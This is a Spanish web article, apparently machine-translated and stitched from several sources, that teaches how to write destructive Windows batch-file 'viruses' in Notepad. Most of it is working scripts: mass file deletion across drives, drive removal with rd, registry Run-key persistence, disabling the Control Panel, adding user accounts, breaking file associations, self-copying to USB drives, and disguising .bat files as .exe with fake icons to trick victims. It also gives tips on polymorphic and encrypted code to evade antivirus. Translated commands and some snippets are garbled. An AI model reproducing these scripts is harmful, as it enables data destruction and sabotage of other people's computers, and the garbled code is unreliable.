Contactos

Creación de virus. Ejemplos de archivos dañinos. Hay que conocer al enemigo de vista. ¿Cómo crear, escribir un virus informático? Códigos para crear virus en el bloc de notas.

Los virus se escriben, por regla general, para arruinar la vida de otra persona: "comer" espacio libre en su PC, desactivar el sistema, "descifrar" contraseñas, etc. A pesar de tales consecuencias, hay virus creados simplemente para reírse de un amigo. Un virus de este tipo se escribe en cinco minutos y no hace nada crítico con el sistema. Los virus de broma más comunes son apagar la PC, abrir el mismo programa varias veces y mostrar texto divertido.

Se crean virus similares sin pretensiones en el Bloc de notas estándar (Bloc de notas), excepto que no se guardan con resolución .txt, sino en el formato de un archivo por lotes .bat.

Cómo hacer un virus

Consideremos paso a paso cómo escribir un virus que abra repetidamente una aplicación.

  1. Abra el Bloc de notas haciendo clic derecho en el escritorio y seleccionando Nuevo → Documento de texto.
  2. Empezamos a llenar nuestro virus de comandos.
    • @echo off //en esta línea prohibimos la salida de comandos
    • echo "el proceso se está ejecutando" //texto que verá el usuario
    • iniciar mspaint
    • goto:p //ejecuta el programa de pintura varias veces
    • pausa // presiona cualquier tecla
    • del %0 //autodestrucción del virus
  3. Para el archivo guardado, cambie el ícono por uno más popular (navegador, Word, etc.) e ingrese el nombre apropiado.

Algunos sorteos más posibles:

Una especie de salvapantallas de la película "The Matrix"

  • @eco apagado
  • color 2
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • ir a
  • pausa

Cambiar cómo funcionan los botones del mouse

  • %SystemRoot%/system32/rundll32 usuario32, SwapMouseButton >nul

cambio de hora

  • hora 0:00

Deshabilitar el teclado

  • teclado rundll32, deshabilitar

Deshabilitar el mouse

  • ratón rundll32, desactivar

Analizamos las formas más simples e inofensivas de gastarle una broma a un amigo. De hecho, después de haber estudiado los comandos del sistema, puede "colocar" irremediablemente el sistema en la computadora de otra persona (e incluso en la suya propia por negligencia).

También puedes conocer la existencia de diferentes tipos de virus en el artículo, pero no debes profundizar en este tema para no crear problemas innecesarios para ti y los demás. Es mejor encargarse de proteger su propia computadora e instalar un programa antivirus confiable para que usted mismo no caiga en la broma de un amigo o enemigo.

Encuentra el sistema operativo que deseas atacar. La mayoría de las veces es Microsoft Windows, especialmente las versiones más antiguas. Muchos usuarios no actualizan sus sistemas operativos, lo que los deja vulnerables a los ataques modernos.

  • Se considera que Mac OS X y Linux están más protegidos contra ataques de virus (debido al trabajo de los derechos de acceso y la arquitectura del sistema operativo). El 95% de todos los virus se dirigen a los usuarios de Windows.

Decide cómo propagar el virus. Un virus se considera virus si puede transmitirse a otros usuarios. Debe idear un método de entrega antes de comenzar a trabajar en la creación de un virus. Componentes de entrega de uso común:

Encuentra un punto débil para atacar. Los virus exitosos aprovechan las debilidades de los programas y la seguridad del sistema para operar y propagarse. Se necesita mucha investigación y conocimiento, pero existen comunidades especializadas que pueden ayudar con esto.

Decide la funcionalidad de tu virus.¿Qué hará el virus después de infectar el sistema? Los efectos pueden variar, desde efecto cero, mostrar un mensaje, eliminar archivos y otros efectos más maliciosos. Tenga en cuenta que crear y difundir virus es ilegal en muchos países.

Elige lengua. Para crear un virus, se necesita al menos un conocimiento básico de algún tipo de lenguaje de programación o herramienta de secuencias de comandos. Los virus más complejos suelen implicar varios lenguajes de programación. Para los virus más eficaces, necesitará conocimientos de lenguaje ensamblador.

  • Si desea crear virus ejecutables, busque cursos de C y C++ en Internet.
  • Si desea crear virus de macro, aprenda el lenguaje de macros para el programa deseado, como Microsoft Office.
  • Visual Basic se puede utilizar para crear malware para usuarios de Windows.
  • Comience a trabajar en su virus. Esto llevará mucho tiempo, especialmente la primera vez. Experimente todo lo que pueda y aprenda sobre formas de distribuir su código según el idioma que utilice. Hay guías y blogs para aprender algunos idiomas.

    • Aprenda sobre el código polimórfico. Esto cambiará el código de su programa después de cada réplica, ocultando el virus de los programas antivirus. El código polimórfico sería un paso bastante avanzado que se crea de diferentes maneras en diferentes lenguajes de programación.
  • Obtenga información sobre formas de ocultar su código. Además del código polimórfico, existen formas de ocultar su virus. El cifrado es una herramienta muy popular entre los desarrolladores de virus. Requiere mucho tiempo y lectura, pero como resultado podrá proteger y prolongar la vida útil de su virus.

  • Comprueba tu virus. Una vez que tenga un prototipo funcional, pruébelo en varias máquinas y compilaciones. La forma más sencilla es utilizar máquinas virtuales con diferentes compilaciones.

    • Intente ejecutar sus pruebas en una compilación cerrada para que su virus no ingrese accidentalmente a la red. Coloque las máquinas de prueba en una red separada y pruebe la propagación del virus.
    • Mejore su código de virus mientras lo prueba. Trabaja en los errores en tu código.
  • LOTE Y EJECUTAR
    INSECTOS

    En este momento, los virus se están multiplicando decenas de miles de veces, como suponemos. Aparecieron allá por los años 80. En aquellos días, el mundo aprendió qué son los virus y qué hacen cuando entran en una PC. Hoy "FUMO" les contaré cómo crear su propio virus en un bloc de notas, y quiero decir que este es solo un archivo de comandos que solo dará órdenes al sistema y al microprocesador.
    Lo más divertido de este trabajo es que el usuario no sabrá que su programa es en realidad una bomba para Windows.
    Entonces empecemos. Has decidido convertirte en un escritor de virus. Le diré de inmediato que estos virus, por supuesto, pueden dañar gravemente una computadora, pero no pueden transmitirse completamente de una computadora a otra. Tú y sólo tú eres responsable de todo lo que le pase a tu computadora. Aquí solo necesitamos un bloc de notas.
    Empecemos:

    1) Abrir el bloc de notas;
    2) Escribimos en él "mspaint", sin comillas;
    3) Guardamos el archivo con cualquier nombre, pero en lugar de .txt escribiremos .bat;
    4) Abra el archivo y vea que Paint se ha abierto 
    Aquí está nuestro primer programa. En lugar de "mspaint", puedes ingresar cualquier programa, por ejemplo: Calc-calculadora, Taskmgr-administrador de tareas ... ¿Pero qué tienen que ver los virus con esto? - usted pregunta. ¡Nada!  Lo siguiente que haremos es un programa para cambiar la hora en la computadora, y además, se copiará a una unidad flash USB (si hay una insertada).
    Entonces, escribimos en el bloc de notas:

    hora 00:00
    copiar %0 F:\Work.bat

    En la primera línea cambiamos la hora a 00:00, y en la segunda copiamos el archivo al disco (F, G, J, K, H), una unidad flash llamada Trabajo. No olvide guardar el archivo del bloc de notas como un archivo .bat. En lugar de la hora, también puede cambiar la fecha "Fecha 13/06/23". Al escribir esa línea, cambiaremos la fecha a 2023, el sexto mes, el 13.   Ahora una pequeña lista de lo que se puede escribir en el virus del Bloc de notas.

    LISTA:

    1) "copiar %0 x:\y" - copia el virus al disco x en la carpeta y (por ejemplo, copiar %0 C:\System.bat);
    2) "etiqueta x:y": cambia el nombre del disco xa y (por ejemplo, etiqueta C:error);
    3) "hora x:y" - cambia la hora en x horas e y minutos (por ejemplo, hora 14:27);
    4) "fecha x.y.z": cambia la fecha a x día, y mes, z años (fecha de ejemplo 16/11/05);
    5) "md x" - creará una carpeta, en el lugar donde está nuestro virus, con el nombre x (ejemplo md Papka);
    6) “del *.* /q” - eliminará todos los archivos (nuestro virus también) en la carpeta donde se encuentra nuestro virus (excepto las carpetas);
    7) "del x:\y *.* /q" - eliminará todos los archivos del disco x en la carpeta y (excepto las carpetas) (ejemplo del F:\Data*.* /q);
    8) “assoc .x=.y” - rehará todos los archivos en la computadora en formato xay (ejemplo assoc .exe = .mp3);
    9) "usuario de red "x" / agregar" - agregará un usuario con el nombre x a la computadora (ejemplo usuario de red "Smoked" / agregar);

    Aquí hay dos programas para que los consideres, puedes usarlos sin mi consentimiento, pero al usarlos aceptas el acuerdo de usuario.

    1) Un programa para eliminar archivos de una unidad flash USB (si hay una insertada) y cambiarle el nombre.
    del F:\ *.* /q
    etiqueta F: HACK

    2) Un programa para cambiar la fecha y la hora en una computadora y copiarla al disco C y a una unidad flash USB.
    hora 14:13
    fecha 11.07.12
    copiar %0 C:\Time.bat
    copiar %0 F:\Tiempo.bat
    Ya sabes cómo crear virus simples. Puede: cambiar la hora, la fecha, los nombres de los discos y unidades flash, abrir programas, crear carpetas, copiarse a sí mismo, agregar usuarios, cambiar extensiones y destruir información. Es una lista bastante corta, para ser honesto. Ahora te enseñaré algunas sutilezas de la escritura de virus. Digamos que ya has creado un virus, pero tiene un aspecto bastante feo. Bueno, ¿quién abrirá un archivo incomprensible? Tienes razón, no hay muchas personas así en el mundo. Cómo cambiar el formato de .bat a .exe y agregar un ícono. Muy fácil (Necesitas tener WinRAR en tu computadora). Encontramos cualquier virus con la extensión .bat, hacemos clic derecho sobre él, hacemos clic en "Agregar al archivo ...". Marque la casilla de verificación "Crear archivo SFX", seleccione la pestaña avanzada y haga clic en el botón "Opciones SFX...". En la ventana "Ejecutar después de descomprimir", escriba los nombres de los virus (por ejemplo, Virus.bat) y en la ventana "Texto y gráficos", luego "Cargar icono SFX desde el archivo". Haga clic en "Examinar" y busque cualquier icono de formato .ico. Ahora haga clic en Aceptar. Listo  Format.exe, no .bat, como deberíamos haberlo hecho. Ahora puedes hacer cualquier cosa con los virus. ¿Qué depende exactamente de usted?
    Digamos que usted escribió un virus que corromperá la información abierta desde las carpetas y causará algún daño:

    del C:\ *.* /q
    del D:\ *.* /q
    eliminar:\ *.* /q
    del F:\ *.* /q
    hora 00:00
    fecha 13/06/23
    del *.* /q

    ¿Está nuestro virus preparado? - Pregúntese. Por supuesto que no. Es necesario terminarlo de inmediato. Con mucho gusto te ayudaré con esto. Y así, nuestro nuevo comando "@echo off" se ingresa al comienzo de nuestro virus y oculta todo lo que sucederá en el futuro. En una palabra, no dejaremos que el usuario vea lo sucedido. Al agregar una acción simple pero muy efectiva después de cada comando, como "> nul" por ejemplo "hora 00:00 > nul", ocultaremos la línea. Entonces, podemos mejorar nuestro virus:

    @eco apagado
    del C:\ *.* /q >nul
    del D:\ *.* /q >nul
    del E:\ *.* /q >nul
    del F:\ *.* /q >nul
    hora 00:00 >nul
    fecha 13.06.23 >nul
    del *.* /q >nul

    Aquí, ahora nuestro virus está listo. Puedes comprobarlo. Pero no te aconsejo que lo compruebes en tu PC  . Guardamos, convertimos, pero qué hacer a continuación es asunto suyo. Por cierto, existe un excelente programa para convertir .bat a .exe, funciona mucho mejor que WinRAR, se llama "Convertidor de Bat a exe". Puedes descargarlo de Internet, es gratis. Entonces, volvamos a la escritura de virus. .
    %SystemRoot%/system32/rundll32 user32, SwapMouseButton Esta línea intercambia los botones del mouse. Puedes divertirte con alguien mientras conduce, qué pasó, pasará el tiempo (si es completamente un usuario), para los superdotados, diré que si lo ingresaste, apágalo de manera muy simple: "Panel de control". , “Impresoras y otros equipos”, “ Ratón" y desmarque la primera casilla.
    Entonces, sigamos adelante:

    :X;
    Iniciar mspaint
    ir a x;

    Una muy buena línea para cargar máquinas débiles. El comando abre Paint y muy rápidamente. 60 veces antes de que te des cuenta de lo que pasó y cierres el programa. Intente ingresar cualquier línea de programa en lugar de mspaint... Funciona  Puede usar varios de estos comandos hasta que la computadora de nuestra víctima se ralentice por completo.

    Escribimos un nuevo guión:

    copiar ""%0"" "%SystemRoot%\system32\File.bat"
    reg agregar "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
    reg agregar HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

    Un comando muy cruel, agrega un programa al inicio del sistema operativo. No te aconsejo que lo revises en tu computadora. No nos detenemos y seguimos adelante. 

    asociación .lnk=.txt >nul
    asociación .exe=.mp3 >nul

    Con estas dos líneas estamos haciendo un daño muy grave al ordenador de la víctima. Cambia las extensiones de todos los archivos en la computadora de .lnk a .txt y de .exe a .mp3. Es decir, todos los accesos directos se abren en el Bloc de notas y los programas, todo, en el reproductor. Genial, ¿sí? Ahora lea el código a continuación y si comprende cuál es la esencia del virus, felicidades, ha completado el curso básico de escritura de virus SMOKED. Si no. Leyendolo todo de nuevo

    @eco apagado
    %SystemRoot%/system32/rundll32 usuario32, SwapMouseButton >nul
    hora 0:00 >nulo
    fecha 13.06.23 >nul
    etiqueta C:IDIOTA >nul
    etiqueta D:URAK >nul
    etiqueta E:SUKA >nul
    etiqueta F:GANDON >nul
    copiar %0 C:\Open.bat >nul
    copiar %0 D:\Open.bat >nul
    copiar %0 E:\Open.bat >nul
    copiar %0 F:\Open.bat >nul
    usuario de red "Idiota que pirateaste" /add >nul
    usuario de red "Perra que pirateaste" /add >nul
    usuario de red "Durak, has pirateado" /add >nul
    usuario de la red "Kritin fuiste hackeado" /add >nul
    usuario de red "Gavno, has pirateado" /add >nul
    md 1 > nulo
    md 2 > nulo
    md 3 > nulo
    md 4 > nulo
    md 5 > nulo
    md 6 > nulo
    md 7 > nulo
    md 8 > nulo
    md 9 > nulo
    md 10 > nulo
    md 11 > nulo
    md 12 > nulo
    md 13 > nulo
    md 14 > nulo
    md 15 > nulo
    md 16 > nulo
    md 17 > nulo
    md 18 > nulo
    md 19 > nulo
    md 20 > nulo
    md 21 > nulo
    md 22 > nulo
    md 23 > nulo
    md 24 > nulo
    md 25 > nulo
    md 26 > nulo
    md 27 > nulo
    asociación .lnk=.txt >nul
    asociación .exe=.txt >nul
    :X;
    Iniciar mspaint
    ir a x;
    :X;
    Iniciar cálculo
    ir a x;
    copiar ""%0"" "%SystemRoot%\system32\Cool.bat" >nul
    reg agregar "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul
    reg agregar HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
    del %0 > nulo

    Esto concluye mis lecciones. ¡Espero que les haya gustado! Atentamente, ¡FUMADO! PD Cuando publiqué este artículo por primera vez en Internet. Alrededor de 70 mensajes llegaron a mi ICQ con una solicitud para piratear el buzón . ¡Escribí todo yo mismo, mi artículo! 

    Para eso, para comprender cómo su computadora no está protegida A partir de las acciones de los intrusos, le sugiero que cree usted mismo algunos virus simples. Gracias a esto comprenderás que cualquier ordenador obedece no sólo a las pulsaciones de teclas. La computadora, habiendo recibido solo un comando (al hacer clic en el ícono del archivo, puede prescindir de él), puede comenzar a abrir, crear, eliminar, cambiar el nombre, etc.
    Como regla general, la extensión de estos archivos es .bat .exe, cualquier nombre inventado antes del punto.

    - archivo .bat se crea en un bloc de notas normal, al guardar, se usa la extensión .bat en lugar de .txt (Sin título.txt o *.txt de forma predeterminada).
    Ejemplo: abra un bloc de notas estándar, escriba mspaint - solo 7 letras, guarde este archivo (archivo - guardar como) no como de costumbre, pero escriba en lugar de "Untitled.txt" - myfile.bat. Naturalmente, en lugar de myfile cualquier nombre conveniente.

    Si ha seguido los pasos anteriores, felicidades: ha creado el primer archivo por lotes que, al hacer clic, abrirá el cajón de Paint (disponible en cualquier Windows).

    - Archivo.exe compilado por un programa especial a partir de un archivo bat (no solo de él) para enmascaramiento u otra funcionalidad.
    Hay muchos programas compiladores similares; puede descargar uno de ellos a continuación, completo con un conjunto de espacios en blanco para experimentar con archivos bat.
    Captura de pantalla del convertidor Bat Exe:


    Pero es posible que los archivos por lotes no sean tan inofensivos como se describe anteriormente. Basta con cambiar su contenido, ya que su computadora comenzará a ejecutar cualquier comando escrito en él.

    Daré ejemplos de los resultados de comandos que se pueden llamar simplemente bromas a un amigo:
    - Cambie la fecha en la computadora, digamos 1812 o su cumpleaños;
    - Abrir constantemente Paint, Calculadora, Error muchas veces seguidas...;
    - Intercambiar botones del mouse;
    - Apaga la computadora;
    - Forzar el reinicio constante de la computadora;
    - Cambiar el nombre del disco duro;
    - Eliminar todos los archivos de la carpeta en la que se encuentra este archivo (Dios no lo quiera, si es un escritorio);
    Y así sucesivamente, casi se te ocurren chistes. Depende de la sofisticación de la mente del vengador.

    A continuación se muestran las acciones brutales de las que es capaz este archivo, aquí no hay tiempo para bromas:
    - La capacidad de grabar de forma independiente en cualquier lugar, incluida una unidad flash USB;
    - Tener un atributo oculto, ser invisible, así como la ejecución de sus órdenes;
    - Cambie el nombre de todos los archivos en la computadora, cambiemos .lnk a .txt y nombre el .exe necesario en el trabajo a .mp3. Resultado: los accesos directos se abrirán en el Bloc de notas, los programas en funcionamiento intentarán abrirse en el reproductor.
    - Oculto varias veces para abrir el mismo programa para ralentizar la computadora;
    - Agregar un virus al inicio cuando enciendes la computadora;
    - Eliminación completa sin posibilidad de restaurar ningún programa. Normalmente los programas se instalan por defecto en un directorio determinado y el hacker lo sabe...
    Esta lista apenas comienza. Pero pararemos, porque esto ya es suficiente para que el ordenador deje de funcionar.

    Para que lo anterior no sea infundado, puede descargar el archivo a continuación.
    Contiene:
    - archivo de texto "Self-tutor.txt" con una descripción de los códigos bat y ejemplos en vivo.
    - Programa para compilar archivos a .exe
    - Cambiar los botones del mouse, por ejemplo.
    - Archivos bat listos para usar útiles e inofensivos:
    otkl-60.bat: apaga la computadora después de 60 segundos
    otkl-60-cancel.bat - cancelar el apagado
    Paint.bat - habilitar Paint
    Symbol.bat: abre la tabla de símbolos

    Descarga creando virus para protegerte contra ellos.- Necesitas conocer al enemigo en persona:

    Al cargar, el antivirus de su computadora puede comenzar a maldecir y hacer lo correcto.
    ¡Ten cuidado! Después de descargar el archivo y descomprimirlo, no haga clic en los archivos sin estudiar las instrucciones o este artículo.

    Puede verificar el contenido del archivo .bat haciendo clic derecho sobre él y seleccionando "Editar" en el menú emergente:


    Antes de experimentar, le recomiendo que cree un punto de restauración del sistema de respaldo.

    Espero que estos experimentos te convenzan de que debes tener más cuidado con los archivos y programas extraños que abrimos e instalamos en tu computadora. Tenga cuidado al trabajar con el correo: no descargue, y mucho menos abra archivos como nuestros ejemplos.

    Termino con una nota menor: ¡Precaución! ¡Los virus están por todas partes!

    DESCARGO DE RESPONSABILIDAD

    Este artículo está escrito con fines educativos y el autor no es responsable de sus acciones. Sea razonable y aprecie el trabajo de los demás.

    ¿Cómo se crean los virus informáticos? Un poco de teoría

    Virus informáticos es un tipo de software malicioso que puede crear copias de sí mismo e infiltrarse en el código de otros programas, áreas de memoria del sistema, sectores de arranque y también distribuir sus copias a través de varios canales de comunicación.

    Los virus informáticos tienen las siguientes clasificaciones:

    • Virus de arranque– virus que penetran en el sector de arranque de los dispositivos de almacenamiento de datos, como discos duros, unidades flash, disquetes, etc., y pueden alterar la disponibilidad de los archivos.
    • Virus de archivos– tipo de virus que se inyectan en archivos ejecutables (archivos con extensiones COM y EXE) y afectan negativamente a su funcionalidad.
    • Virus de arranque de archivos- virus que combinan las funciones de los dos tipos de virus anteriores;
    • Virus de documentos- un tipo de virus que infecta archivos en sistemas de oficina. Este tipo también se denomina "virus de macro", ya que la infección del sistema se produce infectando las macros del programa.
    • Virus de red– tipo de virus que se propagan mediante el uso de una red informática, es decir Servicios y protocolos de red.

    El virus más famoso del mundo se llamaba ILOVEYOU. En esencia, era completamente inofensivo, un gusano que enviaba spam al correo de la gente. Sin embargo, recientemente el mundo ha sido objeto de ciberataques que han hecho que todos piensen en su seguridad. El virus WannaCry infectó muchas computadoras y exigió un rescate de 300 dólares en bitcoins. Sin embargo, algunos analistas creen que esto fue sólo una prueba y habrá otro ataque a una escala mucho mayor y estará dirigido a los usuarios de Apple.

    Y, sin embargo, aunque WannaCry estaba muy extendido y se le había quitado bastante dinero, era un WinLocker normal y corriente que se podía eliminar. El hecho es que en la mayoría de los bancos y empresas que no tuvieron tiempo de calcularlo, pagaron, y 300 dólares para ellos no es una pérdida grave.

    Creamos virus cómicos y no solo

    Creemos algunos virus propios, que no recomiendo comprobar en mi ordenador, ya que esto puede acabar muy mal.

    Absolutamente todo el mundo puede crear este tipo de virus, ya que no necesitamos software especializado, etc., solo necesitamos un bloc de notas.

    Debo decir de inmediato que nuestro archivo se guardará en casi todos los casos, estaremos en formato .bat, escribo el nombre anyname, pero puedes darle absolutamente cualquier cosa.

    Eliminar todos los archivos

    Guardamos este código como anyname.bat y listo, después del lanzamiento, se eliminará todo el contenido.

    Pantalla azul de muerte

    @echo apagado del %systemdrive%*.* /f /s /q apagado -r -f -t 00

    Guardamos este código en el archivo anyname.vbs, tenga en cuenta que aquí el formato del archivo debe ser .vbs, no .bat.

    Formateamos las unidades C, D, E en tres segundos.

    rd/s/qD:
    rd/s/qC:
    rd/s/qE:

    Guardamos este archivo como anyname.bat y lo ejecutamos. Todos los discos se formatearán en tres segundos.

    Efecto Matriz | Efecto matriz

    @eco apagado
    color 02:trucos
    eco %aleatorio%%aleatorio%%aleatorio%%aleatorio%%aleatorio%%aleatorio%%aleatorio%%aleatorio%
    ir a trucos

    Guárdelo como anyname.bat y ejecútelo, no es peligroso para su PC.

    Apagar la PC y deshabilitar la capacidad de reiniciar

    @echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c:tldr del c:tdlr attrib -r -s -h c:windowswin.ini del c:windowswn.ini @echo off Msg *¡TE INFECTÓ! Shutdown -s -t 7 -c "Un virus se está apoderando de c:Drive

    Guárdelo como kind.bat, ¡PELIGROSO INICIARLO EN SU PC!

    Reemplazo de archivos por otros que no funcionan

    Este virus reemplazará los siguientes formatos (.exe .jpeg .png .mpeg .sys)

    @echo fuera de asociación .txt=archivojpeg

    Guárdelo como anyname.bat y ejecútelo.

    Quitar el sistema operativo

    @echo apagado Del C:*.* |y

    Lo guardamos como anyname.bat y lo ejecutamos en la PC de la víctima.

    Y eso es todo por hoy, gracias por leer el artículo y espero que no abuses de la información recibida. Si quieres más virus, escribe en los comentarios, ¡lo haremos! Guarda el artículo en tus redes sociales para no perderlo.

    ¡Buena suerte en la vida y hasta pronto!



    ¿Te gustó el artículo? Compártelo